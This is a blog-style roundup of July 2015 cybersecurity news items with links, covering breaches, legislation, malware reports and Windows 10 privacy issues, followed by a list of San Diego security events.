http://arstechnica.com/security/2015/07/how-the-way-you-type-can-shatter-anonymity-even-on-tor/

 

+ Daimler says hacking concerns drive Nokia maps bid

Daimler Chief Executive Dieter Zetsche said a desire to have better control over data security was one of the reasons Mercedes was bidding for Nokia’s high-definition mapping business. In a call to discuss second-quarter results, Zetsche was asked whether he was concerned about hacker attacks on Mercedes-Benz cars. “You can see from reading the papers that we are trying to acquire a platform together with our German competitors, to gain control over the platform which enables autonomous driving, for exactly these reasons,” Zetsche said.

http://www.reuters.com/article/2015/07/23/us-daimler-nokia-security-idUSKCN0PX0QP20150723

 

+ IG: Lack of cybersecurity staff, technology left USPS vulnerable to 2014 attack

A lack of properly trained cybersecurity workers and a comprehensive cyber strategy were major reasons why the U.S. Postal Service experienced a data breach late last year, a new report found. In November 2014, when data on 2.9 million USPS employees was compromised, the agency was relying on basic cybersecurity protections and untrained workers to keep their systems safe, a July 17 report from the agency’s inspector general found. “At the time the intrusion was identified, Postal Service leadership had not emphasized cybersecurity, as evidenced by its undertrained employees, lack of accountability for risk acceptance decisions, ineffective collaboration among cybersecurity teams, and continued operation of unsupported systems,” the report states.

http://www.fiercegovernmentit.com/story/ig-lack-cybersecurity-staff-technology-left-usps-vulnerable-2014-attack/2015-07-23

 

+ Senate committee poised to upgrade agency anti-hacking laws, again

Federal data security legislation enacted in 2002 that was overhauled last December already is due for an upgrade owing to a confluence of events, say the bill’s authors. First, the Department of Homeland Security laid out a course to wrap its intrusion-thwarting system around all federal networks this year. But DHS had trouble convincing agencies it was legal to let the department scan their Internet traffic for threats. Then came hacks into ill-guarded federal and contractor networks that potentially yielded enough information to bribe government personnel for secrets. Both incidents illustrated that DHS – supposedly the civilian cybersecurity operations center – does not have enough authority to protect other agencies’ networks. Now, the Senate Homeland Security and Governmental Affairs Committee, which pushed through cyber reforms in 2014, is proposing new hacker-prevention legislation.

http://www.nextgov.com/cybersecurity/2015/07/senate-committee-poised-upgrade-agency-anti-hacking-laws-again/118512/

 

+ Most Major Financial Hacks Completely Covered Up

Lieberman Software survey reveals most companies are persistently targeted by cyber attacks and the public only finds out about a small portion of security breaches…

http://www.darkreading.com/most-major-financial-hacks-completely-covered-up/d/d-id/1321143

 

+ The new Microsoft browser has brand new security issues

Yesterday’s release of Microsoft’s Windows 10 saw Microsoft introduce a new browser to replace the aging Internet Explorer. Called Microsoft Edge, it’s supposed to be faster and more secure than its predecessor. However, according to several tech reviews that came out in the hours since its release, cyberattacks are still very possible on Edge…

http://www.komando.com/happening-now/318789/the-new-microsoft-browser-has-brand-new-security-issues

 

+ Hackers give up when they go up against this cybersecurity company

In conversation with George Kurtz, CEO of CrowdStrike…It’s not every day that a company can compel hackers to give up. Yet that’s exactly what CrowdStrike managed to do earlier this year.

http://fortune.com/2015/07/29/crowdstrike-cybersecurity-george-kurtz/

 

+ Clearer, More Stringent Cybersecurity Rules for Government Contractors

The White House wants government contractors to have strong, clear, and consistent rules for protecting sensitive data. Recent breaches underscore problems in the current contactor arrangements, including inconsistent data security standards in federal contracts as well as in various guidelines established by different agencies. A proposal for new rules will soon be available for public comment.

http://thehill.com/policy/cybersecurity/249752-white-house-wants-consistent-cyber-rules-for-contractors

[Note: Many government RFPs, and probably most of the large ones, include FISMA requirements. The issue is not the requirements; it is the lack of assessing whether the contractor actually meets the requirements – same as the problem at Government agencies. The White House should look at the FedRAMP program, which has a consistent, well-thought-out way of defining, and more importantly assessing, the security of cloud service providers who want to do business with the Federal Government….]

 

+ Can thinking like cyberattackers improve organizations’ security?

Getting in the minds of cyberattackers can help organizations mount better defenses against attacks. Here are some ways to accomplish this…

http://searchsecurity.techtarget.com/answer/Can-thinking-like-cyberattackers-improve-organizations-security

 

+ Securing connected machines, what is there to know?

Companies looking to secure their networks should verify and minimize the visibility of their ICS resources over the internet. Due to the growing number of advanced threats, collecting and analyzing threat intelligence can play a valuable role in providing security teams with detailed information about the attack vectors

http://www.m2mnow.biz/2015/07/29/35442-securing-connected-machines-what-is-there-to-know/

 

+10 Security Mistakes Nearly Everyone’s Guilty Of

When it comes to data security, attackers continue to exploit the biggest weakness of all — people. ESET Ireland looks at 10 security mistakes humans continue to make on a daily basis…  (poor hygiene, lax access control.. etc..)

http://www.informationsecuritybuzz.com/10-security-mistakes-nearly-everyones-guilty-of/

 

+ A Security Awareness and Training Policy Checklist

Your organization may already have security training and awareness (STA) program, or (this is less likely nowadays) you may have to build one from scratch…

http://resources.infosecinstitute.com/a-security-awareness-and-training-policy-checklist/

 

3  +++++++

+ Code Theft: Protecting IP At The Source

Your corporate assets are at risk and every day that you avoid taking action shortens the time until your IP will be leaked. Here are six steps toward better data security…

http://www.darkreading.com/endpoint/code-theft-protecting-ip-at-the-source/a/d-id/1321490?

 

+  Nearly all Americans support and want retaliation for cyberattacks (hacking back is illegal!)

The vast majority of Americans are calling for retaliation in the wake of cyberattacks that compromise sensitive government data. Security company Vormetric coordinated with an outside firm in July to poll 1,026 nationally representative U.S. adults on whether they believed action is necessary against a foreign country that breaches U.S. government data; 92 percent said yes. That said, most Americans prefer more passive action with 45 percent saying the government should initiate talks between the sitting president and the attacking country’s leaders to prevent further data breaches, and 36 percent want to impose trade sanctions on a country’s goods.

http://www.scmagazine.com/vormetric-survey-polls-americans-on-cyberattack-government-reactions/article/429049/

 

+ Researchers analyze faulty new Linux backdoor

Researchers at Dr. Web have discovered a faulty trojan designed as a backdoor for Linux that could also target Windows systems. Identified as Linux.BackDoor.Dklkt.1, the trojan – possibly of Chinese origin – is designed to perform functions typical of file managers, SOCKS proxy servers, and remote shells; however, it ignores several of its commands due to poor design, a post indicated. Some of the commands the trojan awaits include change remark, open shell, run an application, start proxy, exit, reboot and turn off a computer. Some of the commands that are ignored include update itself, receive user data and remove itself.

http://www.scmagazine.com/researchers-at-dr-web-have-discovered-a-faulty-trojan-designed-as-a-backdoor-for-linux/article/428793/

 

+  China-tied hackers that hit U.S. said to breach United Airlines

The hackers who stole data on tens of millions of U.S. insurance holders and government employees in recent months breached another big target at around the same time — United Airlines. United, the world’s second-largest airline, detected an incursion into its computer systems in May or early June, said several people familiar with the probe. According to three of these people, investigators working with the carrier have linked the attack to a group of China-backed hackers they say are behind several other large heists — including the theft of security-clearance records from the U.S. Office of Personnel Management and medical data from health insurer Anthem Inc.

http://www.bloomberg.com/news/articles/2015-07-29/china-tied-hackers-that-hit-u-s-said-to-breach-united-airlines

 

+ Sun Tzu 2.0: Is cyberwar the new warfare?

For better or worse, the multitude of networks that help keep our world interconnected is a much different place today than it was in the past. Paradoxically, the networks that provide users with a wealth of information, transactional services and the like have also been used as a battlefield to disrupt our everyday lifestyle.

http://www.net-security.org/article.php?id=2344

 

+ When a cyber attack hits: Who’s in charge?

It takes a combination of specialties to handle a data security incident in a way that fully protects the organization…

http://www.healthcareitnews.com/blog/when-cyber-attack-hits-whos-charge

 

+ For DOD, building the cyber force is a team game

The Defense Department is still in the relatively nascent stages of building its cyber mission force, but it has made some progress in recruitment, training and defining roles. In some ways, it has come down to team building…

http://defensesystems.com/articles/2015/07/30/building-cyber-mission-force.aspx

 

+ Threat Report Identifies Security Risks of Popular Websites and Software

News and entertainment websites unknowingly host more than 50 percent of malvertisements; Flash exploits increase 60 percent and ransomware increases 80 percent since 2014…

http://www.streetinsider.com/Press+Releases/Bromium+Threat+Report+Identifies+Security+Risks+of+Popular+Websites+and+Software/10760919.html

 

+ Researchers Steal Door Badge Credentials Using Smartphone Bluetooth

Weakness in facility access control protocol leaves most badge-in systems open to attack…

http://www.darkreading.com/researchers-steal-door-badge-credentials-using-smartphone-bluetooth/d/d-id/1321510

 

+ Accuvant researchers to release open source RFID access tool

Security researchers have long known about the vulnerabilities of RFID… an open source piece of hardware that can be used to circumvent these readers.

http://www.csoonline.com/article/2953296/physical-security/accuvant-researchers-to-release-open-source-rfid-access-tool.html

 

+ Windows 10 Shares Your Wi-Fi With Contacts

Starting today, Microsoft is offering most Windows 7 and Windows 8 users a free upgrade to the software giant’s latest operating system — Windows 10. But there’s a very important security caveat that users should know about before transitioning to the new OS: Unless you opt out, Windows 10 will by default share your Wi-Fi network password with any contacts you may have listed in Outlook and Skype — and, with an opt-in, your Facebook friends!…

http://krebsonsecurity.com/2015/07/windows-10-shares-your-wi-fi-with-contacts/

 

+ Phishing Up 74% in Q2 2015, Says Infoblox DNS Threat Index

http://www.tripwire.com/state-of-security/security-data-protection/cyber-security/phishing-up-74-in-q2-2015-reveals-infoblox-dns-threat-index/

 

+ One-Third of Industrial Control Systems Breached in Last Twelve Months

According to a report from SANS on the state of Industrial Control System (ICS) security, one-third of respondents (34%) said their systems had been infiltrated or infected in an attack at least twice in the last twelve months.

http://darkmatters.norsecorp.com/2015/07/01/one-third-of-industrial-control-systems-breached-in-last-twelve-months/

 

 

+++  SD/SoCAL security events / opportunities +++

+ CyberTECH events / networking / startups / etc  —  THE cyber happening place in SD!!! 

Join their Meetup Group for the latest event information!   The definition of “Cyber KEWEL

http://www.meetup.com/cybertech/

 

AUG

13 – ISC2 –  6PM –  Care Fusion – Cyber Security In Healthcare: Just What The Doctor Ordered?  David Scott.

Location – BAH (Suite 200)  4055 Hancock Street, San Diego, CA 92110 USA

 

20 – ISACA – noon –  Running InfoSec for America’s Finest City – Gary Hayslip – Coleman University

http://isaca-sd.org/event/august-2015-isaca-san-diego-chapter-meeting/

 

27  – ISSA – (4th Thus at 11.30)  – ‘Cybercrime: Operational Risk or Overblown Threat”    Stephen Cobb

(at ADM Baker field clubhouse)

http://www.sdissa.org/

 

—-  Global  Cyber events:

https://www.secureworldexpo.com/

https://heimdalsecurity.com/blog/44-relevant-cyber-security-conferences-around-the-world/

http://thecyberwire.com/events.html

 

Comments are closed.